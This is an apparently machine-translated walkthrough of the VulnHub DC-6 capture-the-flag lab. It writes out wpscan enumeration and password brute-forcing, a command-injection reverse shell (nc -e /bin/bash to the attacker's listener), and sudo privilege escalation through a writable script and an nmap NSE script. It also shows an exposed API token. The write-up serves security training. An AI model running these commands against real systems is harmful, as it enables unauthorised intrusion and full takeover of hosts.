Introduce

series ： DC（ This series consists of 10 platform ）
Release date ：2019 year 4 month 26 Japan
difficulty ： primary - intermediate
Flag： obtain root jurisdiction , And get the only flag
Study ：
● wordpress Security testing
● Local code execution
● nmap Raise the right

Target address ：https://www.vulnhub.com/entry/dc-6,315/
Prompt information ：

• Target support Virtualbox and Vmware
• Need modification hosts file , Such as ：192.168.0.142 wordy
• The password book can be obtained in the following ways , Improve test speed ：

cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt

information gathering

The host found

arp-scan The host found

arp-scan -I eth0 -l

Host information detection

Information detection ：nmap -A -p- 192.168.40.153, Only open 22 and 80 port

Visit website

The first change hosts file , When I opened it, I saw that it was WordPress Site

wpscan Test site

1. wpscan List the user name of the site 、 account number .

Found some accounts ：admin、graham、mark、sarah、jens

wpscan --url http://wordy/ -e u --api-token se5dzb2kuZqWOYN3gK91L5asNOu1jNA0mdzDgSgndc8

2. wpscan Missed scanning website , No valuable information was found .

wpscan --url http://wordy/ -e vp --api-token se5dzb2kuZqWOYN3gK91L5asNOu1jNA0mdzDgSgndc8

3. wpscan Blasting website

Try according to the user name you get , And the dictionary mentioned in the range prompt , Blow up the website , Get the user name ：mark, password ：helpdesk01

 Prepare the password dictionary ：
cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt

 Prepare user name dictionary , It is the one tested 5 Users 

 Start blasting ：
wpscan --url http://wordy -P passwords.txt -U user.txt

Log in to the site

After logging into the website , After a simple search , Found a host ping Test site for . You can try to find out if there are any classic command execution vulnerabilities . At its worst, it can be tested “Activity monitor” Is there any vulnerability in the plug-in .

There are two buttons under the input box , After testing , the last one “Lookup” Button can cause command execution effect

rebound shell

kali monitor ：nc -nvlp 9999
 Bounce order ：127.0.0.1 | nc -e /bin/bash 192.168.40.129 9999
 Get interactive shell：python3 -c 'import pty; pty.spawn("/bin/bash")'

information gathering

I saw something on the target plane 4 Users , Go to their home directory first

Sensitive files found , Identity switch to graham found sudo The possibility of raising rights

Raise the right

Switch to jens

Ideas ： Find out graham It can be used jens Identity execution for /home/jens/backups.sh, hold /bin/bash Append to this file , And then use jens When this file is executed as, a file with jens The powers of the shell.

from /home/jens/backups.sh hear ：

1. Enter the corresponding path first ：cd /home/jens
2. hold /bin/bash Append to this file ：echo '/bin/bash' >> backups.sh
3. Switch identities ：sudo -u jens ./backups.sh

After identity switching , Find that you can continue sudo Raise the right , It's really easy to raise the right

The right is raised to root

nmap  You can execute script files , You can create a file and write to it  shell  The order of ：
echo 'os.execute("/bin/sh")' > rootshell.nse

 With root You can use nmap Execute this script ：
sudo nmap --script=rootshell.nse